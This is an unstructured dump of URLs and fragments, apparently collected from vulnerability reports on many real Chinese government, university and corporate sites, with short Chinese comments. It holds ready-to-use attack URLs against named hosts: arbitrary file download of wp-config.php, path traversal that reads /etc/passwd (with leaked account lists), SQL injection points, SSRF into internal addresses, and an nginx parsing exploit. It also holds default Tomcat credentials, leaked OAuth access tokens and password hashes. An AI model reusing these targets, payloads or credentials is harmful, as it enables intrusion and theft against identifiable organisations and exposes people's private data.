http://www.csai.tsinghua.edu.cn/,网站使用的wp主题存在任意文件下载漏洞,访问http://www.csai.tsinghua.edu.cn/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php,就可以下载wp-config.php文件,内有mysql的密码,可能会被继续渗透。发现漏洞后没有深入测试。 http://211.151.12.44/ http://211.151.12.44/admin/ http://kjc.upc.edu.cn/sub/jgsz.aspx?cid=002&sid=002001 http://www.szgl.net/web_new/hyb/ly_ck.asp?id=2107参数id存在注入 http://in.sdo.com/ 
http://www.yichemall.com/ http://www.yichemall.com/product/getmasterbrand http://221.239.0.160/ http://www.tootoo.cn/ http://121.199.34.73:81 http://121.9.222.177:8080/ http://www.51yougo.com/MemberZone/List-Order.aspx?Code=D-20150111-00002#订单号是日期-5位数字,即第一个订单00001,00002 http://www.91taoke.com/index.php?m=Peitao&a=index&pkid=6119,该出存在sql注入,可直接sqlmap爆破 http://www.xnsl.gov.cn/ http://www.xnsl.gov.cn//c.php http://gkzp.njnu.edu.cn/ http://www.gggxw.gov.cn/show.asp?id=821 http://www.gggxw.gov.cn/eWebEditor/Admin_Login.asp http://wooyun.org/bugs/wooyun-2015-091289 http://wooyun.org/bugs/wooyun-2015-091290 http://wooyun.org/bugs/wooyun-2015-091291 http://wooyun.org/bugs/wooyun-2015-091292 http://wooyun.org/bugs/wooyun-2015-091293 http://www.asp168.com/default.php?mod=article&fid=47 http://www.tzpolice.gov.cn/getjwj.php?op=1 http://www.tzpolice.gov.cn/getjwj.php?op=1 www.yixing.gov.cn/getjwj.php?op=1&id=1 http://www.bzgt.gov.cn http://www.chongchuan.gov.cn http://www.yixing.gov.cn http://www.huishan.gov.cn http://www.ntgz.gov.cn/ http://www.anji.gov.cn http://www.shsmu.edu.cn http://www.lixin.edu.cn http://www.sdju.edu.cn http://eng.shift.edu.cn http://www.njedu.gov.cn http://www.hnsqga.gov.cn http://www.whga.cn http://www.pingpinganan.gov.cn http://www.ahga.gov.cn http://www.ntga.gov.cn http://cts.tcl.com/ http://cts.tcl.com/admin/index.html http://cts.tcl.com/admin/index.aspx http://www.bjoil.com/ http://www.bjoil.com/bjoil/portalmember/findRegisterMember.action http://www.jhpa.com.cn/ http://www.jhpa.com.cn:89/en/print.php?artid=299 http://www.strongsoft.net/ http://oa.china-sss.com/defaultroot/GovSendFileBoxAction.do?editId=2&sendFileUserId=1&action=delBatch http://222.68.17.102/index.php/creative/item http://oa.china-sss.com/defaultroot/WorkflowCommonAction.do?curActivityId=1&flag=back http://oa.china-sss.com/defaultroot/mobile/index.jsp?action=password http://oa.china-sss.com http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_info_l 
http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_ http://210.44.112.101 http://210.44.112.101/R9iPortal/cm/cm_info_ http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_i http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://210.44.112.101 http://210.44.112.101/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_info_content.jsp?info_id=82* http://203.86.55.104/ http://203.86.55.104/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://61.139.105.105:8008/ http://61.139.105.105:8008/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://124.128.96.98:8001/ http://124.128.96.98:8001/R9iPortal/cm/cm_notice_content.jsp?info_id=4* http://123.125.106.97/test/data.php http://123.125.106.97/test/data.php?date=../../../../../../../../../../../../../../../../etc/passwd%00&type=../../../../../../../../../../../../../../../../etc/passwd%00 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sysmon:x:60422:60422::/nonexistent:/nologin 
sshd:x:500:500::/home/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin libin1:x:502:502::/usr/home/libin1:/bin/bash junhai:x:503:503::/usr/home/junhai:/bin/bash qingming:x:504:504::/usr/home/qingming:/bin/bash liyuan:x:505:505::/usr/home/liyuan:/bin/bash hangang:x:507:507::/usr/home/hangang:/bin/bash wangshuo:x:508:508::/usr/home/wangshuo:/bin/bash genlei:x:509:509::/usr/home/genlei:/bin/bash xiaoyue1:x:514:514::/usr/home/xiaoyue1:/bin/bash pengjie:x:520:520::/usr/home/pengjie:/bin/bash taohui:x:528:528::/usr/home/taohui:/bin/bash yuli3:x:533:533::/usr/home/yuli3:/bin/bash search:x:536:536::/usr/home/search:/sbin/nologin xueyun:x:537:537::/usr/home/xueyun:/bin/bash jianqing:x:540:540::/usr/home/jianqing:/bin/bash hongwei6:x:542:542::/usr/home/hongwei6:/bin/bash wuhua1:x:543:543::/usr/home/wuhua1:/bin/bash mysql:x:545:545::/usr/home/mysql:/sbin/nologin xiaolong:x:547:547::/usr/home/xiaolong:/bin/bash qixing:x:548:548::/usr/home/qixing:/bin/bash liuxin4:x:549:549::/usr/home/liuxin4:/bin/bash zhuhuan:x:550:550::/usr/home/zhuhuan:/bin/bash zhongqin:x:551:551::/usr/home/zhongqin:/bin/bash leilei3:x:552:552::/usr/home/leilei3:/bin/bash yajun:x:554:554::/usr/home/yajun:/bin/bash dalong1:x:556:556::/usr/home/dalong1:/bin/bash kaijun1:x:557:557::/usr/home/kaijun1:/bin/bash zhenqiang1:x:561:561::/usr/home/zhenqiang1:/bin/bash jinqiang:x:565:565::/usr/home/jinqiang:/bin/bash rdsup_api:x:567:567::/usr/home/rdsup_api:/bin/bash 
chenyang:x:568:568::/usr/home/chenyang:/bin/bash shukui1:x:569:569::/usr/home/shukui1:/bin/bash bangjian:x:572:572::/usr/home/bangjian:/bin/bash kaiwei3:x:574:574::/usr/home/kaiwei3:/bin/bash maqian:x:576:576::/usr/home/maqian:/bin/bash guochao3:x:578:578::/usr/home/guochao3:/bin/bash xiaofeng6:x:580:580::/usr/home/xiaofeng6:/bin/bash xiaodong2:x:581:581::/usr/home/xiaodong2:/bin/bash wb_liukai:x:582:582::/usr/home/wb_liukai:/bin/bash wb_guorui:x:583:583::/usr/home/wb_guorui:/bin/bash wb_zhuoyue:x:584:584::/usr/home/wb_zhuoyue:/bin/bash hean:x:585:585::/usr/home/hean:/bin/bash zhuxing:x:588:588::/usr/home/zhuxing:/bin/bash xingdong:x:589:589::/usr/home/xingdong:/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin hongkai1:x:590:590::/usr/home/hongkai1:/bin/bash baohua:x:591:591::/usr/home/baohua:/bin/bash tangkai:x:592:592::/usr/home/tangkai:/bin/bash http://123.125.106.97/test/data.php?date=../../../../test/data.php%00&type=1 http://218.30.108.52:8093/ http://218.30.108.52:8093/?url=http://admin.weibo.com http://315.stock.hexun.com/login.action http://315.stock.hexun.com/ http://315.stock.hexun.com http://www.dajiawan.com/admin.php?module=HuiYuan&action=genjin&uid=1 http://nextprime.drivehq.com/iframe.html https://en.wikipedia.org/ https://www.bing.com/ https://www.baidu.com/ https://onedrive.live.com/ http://jwc.cicp.edu.cn/homepage/index.do http://www.dell-solution.com/DataInfo.aspx?id=586 http://www.dell-solution.com/VideoInfo.aspx?id=512 http://www.camac.org.cn/xiehui/xiehui.php?id=41 http://jobs.china-sss.com www.shfu.edu.cn http://app.shfu.edu.cn:8080/sis/static/logon/login.jsp http://app.shfu.edu.cn:8080/sis/static/logon/guide.doc http://app.shfu.edu.cn:8080/sis/static/logon/logon.jsp.081009bak http://211.137.109.193/ jdbc:mysql://localhost:3306/ax http://oa.china-sss.com/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile http://www.syfc.com.cn/fcjxyjs/web/xyjc/view.action http://cn.club.vmall.com/uc_server/ 
http://888.qq.com/ios/channel/ios_order.php?uid=1 http://exp.gliet.edu.cn/xszzzx/Admin/login.aspx http://exp.gliet.edu.cn/xszzgl/login.aspx http://onlinejudge.guet.edu.cn/guetoj/ http://ktshop.tcl.com/web/tclkt/login.jsp http://www.07073.com/plus/digg_ajax4.php?type=goodpost&id=1 URL:http://zhongguowangshi.com/search.aspx?keyword=%27 inurl:http://gd.10086.cn/10086/channel/yyt/password http://gd.10086.cn/10086/channel/yyt/sz.shtml?_login_backurl=%2fcommon%2fredirect.jsp&_logonname=1392745457&_logintype=2&_password=748874&_smsrnd=&_imagecode=%E7%EB%B5%E3%BB%F7%EA%E4%E8%EB http://www.bitcar.com/ http://www.bitcar.com/admin/Manage.aspx http://dsa.bitcar.com http://dsa.bitcar.com/Login.aspx?methed=checkLogin http://dsa.bitcar.com/Login.aspx?methed=checkLogin http://dsa.bitcar.com/Page/Manage/Login.aspx http://www.bitcar.com http://log.bitauto.com/newsstat/PageAreaStatistics/config.ashx?ids=10%29and/**/1=1--&callback=PageAreaStatistics.bind&seed=0.8790570520236984 http://202.120.40.2:81/professor.action?request_locale=zh_CN http://admin.21cn.com/WEB-INF/web.xml http://admin.21cn.com//WEB-INF/applicationContext-redis.xml http://admin.21cn.com//WEB-INF/applicationContext-mailsender.xml http://admin.21cn.com/WEB-INF/classes/mailsender.properties http://59.151.119.244/ http://59.151.119.244/ http://dgtx.com.cn/ http://oldweb.lib.sjtu.edu.cn/sjtu.tar.gz http://59.36.102.26/login/login.html http://59.36.102.26/login/login.php http://59.36.102.26/test.php inurl:cunnewslist.aspx?deptid= http://222.135.109.70:8100/cunnewslist.aspx?deptid=1566&id=277 http://222.135.76.147:8100/cunnewslist.aspx?deptid=588&id=277 http://218.56.40.229:8060/cunnewslist.aspx?deptid=4425&id=276 http://111.17.169.213:800/cunnewslist.aspx?deptid=4397&id=276 http://60.217.72.17:8000/cunnewslist.aspx?deptid=1455&id=277 http://123.134.189.60:8021/cunnewslist.aspx?deptid=5005&id=279 http://61.133.119.187:8089/cunnewslist.aspx?deptid=1273&id=277 http://www.ysland.gov.cn/xinfang/visitshow.asp?id=25 
http://www.ysland.gov.cn/xinfang/rulelist.asp?cid=1 http://www.ysland.gov.cn/xinfang/ruleshow.asp?id=13 http://www.ysland.gov.cn/vote.asp http://www.ysland.gov.cn/xinfang/getpass.asp http://www.jnjgsw.cn/FindNews.aspx?newstitle=1 https://open.weibo.cn/oauth2/authorize?client_id=741740764&redirect_uri=http%3A%2F%2Faccount.xiaomi.com%2Fpass%2Fsns%2Flogin%2Fload&scope=all&response_type=code&display=mobile&packagename=com.xiaomi.channel&key_hash=d52e033c39b6f47a0248b2505a2d6a91 https://open.weibo.cn/oauth2/authorize http://account.xiaomi.com/pass/sns/login/load?access_token=2.00ByhXsF0ieQMoa397a2459f8ETrVD&remind_in=7799376&expires_in=7799376&uid=5386620141 http://account.xiaomi.com/pass/sns/login/load,所以会导致Access https://account.xiaomi.com/pass/sns/login/load?access_token=2.00ByhXsF0ieQMoa397a2459f8ETrVD&remind_in=7818085&expires_in=7818085&uid=5386620141 http://account.xiaomi.com/pass/sns/login/load作为重定向URL,造成了Access http://www.ccbd.cn/ http://www.ccbd.cn/test.php http://www.slfc.net.cn/list.php?&cid=224 http://xq.ibaihe.com/baihe/login http://wap.sogou.com/ http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_selinfo.php?ID=238 http://www.cmccb.org.cn/cmccbnew/Pyj/Pyj_selinfo.php?Pyj_Code=51 http://www.cmccb.org.cn/cmccbnew/SiteInfo/SiteInfo_Onesel.php?Bar_ID=26 http://www.cmccb.org.cn/cmccbnew/Germ/Germ_sel.php http://www.cmccb.org.cn http://www.cmccb.org.cn/cmccbnew/Germ/Germ_sel.php www.cmccb.org.cn http://oa.china-sss.com/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge.jsp?numId=1 http://oa.china-sss.com/defaultroot/govezoffice/gov_documentmanager/govdocumentmanager_judge_seq.jsp?seqId=1&seqfig=1&recordId=1 http://211.149.204.144:8080/ http://114.251.15.2/gams/login.php http://jiangjia.bitauto.com/zixun.ashx?action=zixun&p=50005350_112621&_=1421048786873 http://www.8684.cn/ http://passport.8684.com url:http://119.145.57.20:85/manager/html user:tomcat pass:tomcat http://m.yaofang.cn http://m.yaofang.cn//cart/disList 
www.wooyun.org/bugs/wooyun-2010-086923 http://www.zbcdc.com/info_Print.asp?ArticleID=1296 http://www.zbcdc.com/article_js.asp?ClassID=1&IncludeChild=true&SpecialID=1&ArticleNum=6&ShowType=1&ShowCols=1&ShowProperty=true&ShowClassName=false&ShowIncludePic=false&ShowTitle=true&ShowUpdateTime=false&ShowHits=false&ShowAuthor=false&ShowHot=true&ShowMore=false&TitleMaxLen=30&ContentMaxLen=200&Hot=false&Elite=false&DateNum=&OrderField=ArticleID&OrderType=desc http://www.zbcdc.com/yufangyixue/info_Print.asp?ArticleID=1168 http://www.zbcdc.com/yufangyixue/news_Class.asp?ClassID=1&SpecialID=0&page=1 http://www.zbcdc.com/yufangyixue/info_Class.asp?ClassID=1&SpecialID=0&page=1 http://www.zbcdc.com/info_Class.asp?ClassID=28&SpecialID=0&page=1 http://m.yaofang.cn/cart/cityList post:province_id= url:http://m.yaofang.cn//cart/delGoods post:goods_id=&r=0.6412887854967266 get:http://m.yaofang.cn/cart/disList url:http://m.yaofang.cn//cart/updateCartGoodsNumber url:http://aiesecsysu.org/admin/login/auth http://ims.zj31.net/pm/sys/Login_dologin.action http://is.gd/wnezNK http://59.151.102.92/,这个ip段应该是易车。。。的吧。 http://oa.yto56.com.cn//C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&UserName= inurl:townnewslist.aspx?deptid= http://222.135.127.190:7000/townnewslist.aspx?deptid=190&id=220 http://221.2.171.59:8000/townnewslist.aspx?deptid=156&id=246 http://61.133.119.187:8089/townnewslist.aspx?deptid=153&id=257 http://218.56.40.229:8032/townnewslist.aspx?deptid=3952&id=220 http://222.135.109.70:8100/townnewslist.aspx?deptid=172&id=246 http://218.58.124.131:8002/townnewslist.aspx?deptid=4537&id=224 http://222.135.127.190:7000/townnews.aspx?deptid=180&id=265&at=1 http://222.135.76.147:8100/townnews.aspx?deptid=205&id=265&at=1 http://222.135.109.70:8100/townnews.aspx?deptid=765&id=265&at=1 http://221.2.171.59:8000/townnews.aspx?deptid=1376&id=265&at=1 http://221.2.149.47:8100/townnews.aspx?deptid=196&id=265&at=1 http://www.scww.org.cn/index.php/News/contentpage?aid=643 
http://ehr.tcl.com/Audit/login.aspx http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelAuthentication/myApply/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/?menuId=0000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/modify_company/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/certmanager/mycerts/?menuId=2000001 http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/MyRegistrationApplies/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/self_service/pending/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/ChannelPartnerRegistration/ChannelRegistration/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/channel_partner/patnersQuery/?menuId=2000000 http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003 http://enterprise.zte.com.cn/cn/partners/Prefecture/gdServiceRequest/gdServiceQuery/?menuId=2000003 http://lab.sdut.edu.cn/jsjrjsys/shownews.asp?newsid=103%27 http://home.focus.cn/group/endresult.php?v_poll_id=5036&group_id=1728&m=0 http://**.**.**/xgrptwo/index.jsp command:emailAccount=chenjf32@1269,udId=46,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.84&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&AUTO_REPLY_MSG=&SIGNATURE=&SECRET_ANSWER=&COLOR_ID=&WARNING_QUOTA=&SEND_MAIL_NAME=&PASSWORD=&SECRET_QUESTION=,managerAccount=null,ret=AUTO_FORWARD=&SEND_MAIL_NAME=&CONTACT=&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=8&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7D607d3b7eb6f521f22c7856df720a8462&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0 
command:emailAccount=frank.han@15164,udId=38,commandId=1,param=AUTO_FORWARD=&OPERATION_FLAG=&LANGUAGE_ID=&IP=10.28.10.88&MAILBOX_MAX_SIZE=&WHITELIST=&MAIL_PER_PAGE=&TEMPLATE_ID=8&POP_SETTING=&CONTACT=&BLACKLIST=&FONT_ID=&A&IP=&FONT_ID=0&SIGNATURE=&LANGUAGE_ID=0&SECRET_ANSWER=&TEMPLATE_ID=39&WARNING_QUOTA=0&BLACKLIST=&OPERATION_FLAG=216&POP_SETTING=&AUTO_REPLY_MSG=&WHITELIST=&MAIL_PER_PAGE=20&SECRET_QUESTION=&PASSWORD=%7BMD5%7Dfa1105eab2c3cfefc46f478d083070b7&MAILBOX_MAX_SIZE=1073741824&COLOR_ID=0 http://exam.chanjet.com/exam/portal/index.jsp http://exam.chanjet.com/exam/userphoto/a/8/1/4/7/ff8080814ab5661b014ade066e4d0822.jsp http://ts.21cn.com/tousu/cat/id/index.php?m=Home&a=topreply&id=13818%23 http://zhaopin.nau.edu.cn/contoller.do?operation=readInfo&queryId=289 http://sm4.iphy.ac.cn/n_list.php?fid=5 http://aliyun.com http://www.net.cn http://aliyun.com https://github.com/xiaodingbian/fengchu/blob/3618c8a1d18084d7fbb3f3c236ba3491bd7615ec/common/src/test/resources/wolong.properties http://smsgate.ucweb.com:8090/send http://vip.189.cn/web/front/downloadFile?name=/../../../../../../../..//../../etc/passwd%00.docx http://114.80.121.164/a http://219.148.21.226 http://admin.china-eroom.com:8080/login_toLogin.action http://60.216.47.168:XXXX/defaultroot/login.jsp url:http://211.103.171.50:8180/manager/html http://211.103.171.50/ http://www.credithe.com/ http://www.hexincaifu.com/ http://211.103.171.50:8085/ http://202.120.188.139/Citrix/XenApp/auth/login.aspx http://cmp.surfing3c.com:9500/platform/framework/global/login.jsp http://cmp.surfing3c.com:9500/ http://cmp.surfing3c.com:9500/web-console/ http://218.241.153.225:6100/superadmin/adminLogin.action http://port.joycloud.mobi:81/WebServices/SMS/send_smsserver.ashx http://port.joycloud.mobi:81/WebServices/SMS/send_smsserver.ashx?username=XXXX&pwd=XXXX&phone_number=13911403029&neirong=您的验证码是123456 app.hexindai.com/nicai http://app.hexindai.com/nicai http://www.noahwm.com/skin/myfof/mb/m.aspx?id=59 
http://www.noahwm.com/skin/myfof/mb/m.aspx?id=59 inurl:xmlpzs/prewebissue.asp inurl:xmlpzs/nowwebissue.asp www.tazzfdc.com/bit-xxzs_new/xmlpzs/prewebissue.asp www.bjsfdc.com.cn/bit-xxzs/xmlpzs/prewebissue.asp www.xnfcxx.com/bit-xxzs/xmlpzs/prewebissue.asp www.xyfg.gov.cn/bit-xxzs/xmlpzs/prewebissue.asp cn:5661/bit-xxzs/xmlpzs/prewebissue.asp www.lzfg.com.cn/bit-xxzs/xmlpzs/prewebissue.asp sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/prewebissue.asp www.whxfdc.com/bit-xxzs/xmlpzs/prewebissue.asp www.scybfdc.com/ybxxzs/xmlpzs/prewebissue.asp www.xjfyfc.com/bit-xxzs/xmlpzs/prewebissue.asp www.xjksfcw.com/bit-xxzs/xmlpzs/prewebissue.asp www.bjsfdc.com.cn/bit-xxzs/xmlpzs/nowwebissue.asp www.hzfjw.com:8081/bit-xxzs/xmlpzs/nowwebissue.asp www.lzfg.com.cn/bit-xxzs/xmlpzs/nowwebissue.asp huangshanhouse.gov.cn/xmlpzs/nowwebissue.asp www.xyfg.gov.cn/bit-xxzs/xmlpzs/nowwebissue.asp www.tazzfdc.gov.cn/bit-xxzs/xmlpzs/nowwebissue.asp sys.syfdc.gov.cn/tt/bit-xxzs/gs/xmlpzs/nowwebissue.asp www.lwfccs.com/bit-xxzs/xmlpzs/nowwebissue.asp www.wnfdc.com/bit-xxzs/xmlpzs/nowwebissue.asp site:21tb.com bjd.tcl.com/faqs.aspx?faqskeyword=tcl http://baodian.women.sohu.com/Report/ajax_getReport http://www.wxcitycq.com http://218.206.27.200:8080/cqCityFM/ygjw/vcode!veriImg.action?id=9c3583ebe8e442f2ac99cb4072221d45 https://github.com/cnzhangzhen/IWOM/blob/b9fa38f2c0ea207f9c673fa0be8e284c90abb6f8/config/environment.rb http://116.228.188.147:8484/gcportal/login.jsp http://116.228.188.147:8484/setup/ http://www.cartel.tcl.com/ http://www.dantu.gov.cn/allStation/dantu/www_dantu_gov_cn/advicesubjectqzzc.jsp?saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn&webSubjectId=www_dantu_gov_cn_82&id=2d7f6b01-6d80-484d-8219-cba1735bfdac http://gdjct.gmcc.net:8080/content/add.jspx?cid=111上传附件的位置存在任意文件上传,方法太简单,就不讲了 http://202.192.128.60/jyzc/baoxiu/admin/ http://202.192.128.60/jyzc/baoxiu/admin/admin_user_edit.asp?user_id=1页面修改管理员密码时,发现原密码经过md5加密后泄漏在源代码中。于是F12果断拿下md5破解之。如图 
http://read.html5.qq.com/image?imageUrl=http://10.156.52.13/favicon.ico http://www.xzwsxx.org/sys_jmda/Admin/framework.aspx http://www.zzrc.cn/index/forgetpassw.do http://www.zzrc.cn/index/nextforgetpassw.do http://www.zzrc.cn/index/findpassthreestep.do http://www.zzrc.cn/index/updateperInfo.do http://wooyun.org/bugs/wooyun-2010-089495 http://ufbg-ss02.yonyou.com/Login/login.aspx?ReturnUrl=%2flogin.aspx http://desktop.yonyou.com/Login/login.aspx?ReturnUrl=%2flogin.aspx https://jumppageitg.houston.hp.com/personalcloud/home.action http://www.taishan.gd.cn/user/userreg.asp www.taishan.gd.cn http://www.taishan.gd.cn http://www.taishan.gd.cn/user/userreg.asp http://114.80.121.164/ http://www.dyrc114.com/news/list.asp?boardid=15 http://www.dyrc114.com/news/list.asp?boardid=15 http://drops.wooyun.org/tools/3186 http://uxss.sinaapp.com/index.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated 
SSH:/var/empty/sshd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin webuser:x:500:100::/home/webuser:/bin/bash yangfentao:x:501:501::/home/yangfentao:/bin/bash http://patent.tcl.com/console/ facetime:test@wooyun.org http://www.greefinance.com/,站点,打开珠海格力集团财务有限公司,发现了多处注入点。1.http://www.greefinance.com/showcontext.asp?showid=108,如图所示: http://www.greefinance.com/ywjs.asp?ywjsid=1,如图所示: http://www.greefinance.com/gsjj.asp?gsjjid=1,如图所示: www.sxyrcb.com/admin/admin_admin.asp http://drops.wooyun.org/tools/3186 http://uxss.sinaapp.com/index.php https://121.14.133.156/ http://rb.dantu.gov.cn/allStation/rb/rb_dantu_gov_cn/subject.jsp?webSubjectId=rb_dantu_gov_cn_1¤tPage=1 http://kk.landray.com.cn:8081/head/head.php?username=yangjw http://www.ihaier.com/ http://www.ihaier.com/Project/detail/id/2186 http://ocean.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=510301-10146 http://159.226.22.201:9010/Portal/metadata/downloadMetadataXML.jsp?id=100106-10041 http://lake.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=210008-10099 http://tibet.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=100111-10000 http://henu.geodata.cn/Portal/metadata/downloadMetadataXML.jsp?id=475000-4 http://member.yuxindata.com http://member.yuxindata.com http://mail.zaojiao.com.cn/phpmyadmin http://tuan.bitauto.com/activity/BM-188/20005/2032* http://www.kkdao.com/ https://agent.hexindai.com/guarantee/login.html https://agent.hexindai.com/recommend/login.html http://www.datacarrier.cn/ http://scm.wyn88.com/sas/supplierIndex/supplierIndexAction!getDatasByType.action http://61.175.99.147/admin/ http://xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../../{{}} 
http://xiaowei.yixin.com/test.txt,同步成功。 http://xiaowei.yixin.com/test.txt/1.php,访问该连接成功解析,nginx解析漏洞存在。 http://xiaowei.yixin.com/xiaowei.txt/1.php成功 english:english.creditease.cn http://widget.renren.com/dialog/share?resourceUrl=http://10.10.116.11 http://103.243.137.4/index.php http://www.baomihua.com/manage/UserInfoModify/LabelInfo.aspx http://www.zjgzfcg.org/purchase/Project/ProjBidCateShow.aspx http://223.4.212.124/front/display.action?articleId=402881ee46576d14014657b2b7060014 http://219.142.42.19/ http://219.142.42.19/login.do?method=show_modPassword http://i.maxthon.cn/。中间人可以在这页上插入脚本,调用maxthon对象。 http://game.feng.com/game/newsAuthor/jsonToInformation-page-2-type-all-sort-time_desc.shtml?contributor=98wwcc http://1.85.33.149:8080/vrd/front/userInfo/gotoIndex.action http://www.joinwish.com/wishdetail_service/loadgivers?id=10076886&page=1&sort=1 http://www.zkungfu.com/app/website/tcustomdiningclasslistonlinecontroller/queryDiningMclassList?diningmclassid=1 http://diantai.ifeng.com:80/index.php/stat/viewStat index.php/stat/clickStat http://opr.84000.com.cn:8480/gcportal/login.jsp http://opr.84000.com.cn:8480/setup/ inurl:/docinfo.action?dbid= http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.199.163.37/docinfo.action?dbid=72&docid=40619 http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793 http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927 http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517 http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://202.195.136.150/docinfo.action?dbid=72&docid=40824 http://cx.wap.unisk.cn/user/user/login.action http://www.aspcms.com/aspcms-2179839-1-1.html http://hbmtsrm.hisense.com/custom/GetNewsPageData.aspx?pagetype=GroupNewsList&keyword=&GroupId=189&buyGroupId=&companyId=&child=true&p= https://202.103.124.60/por/login_psw.csp 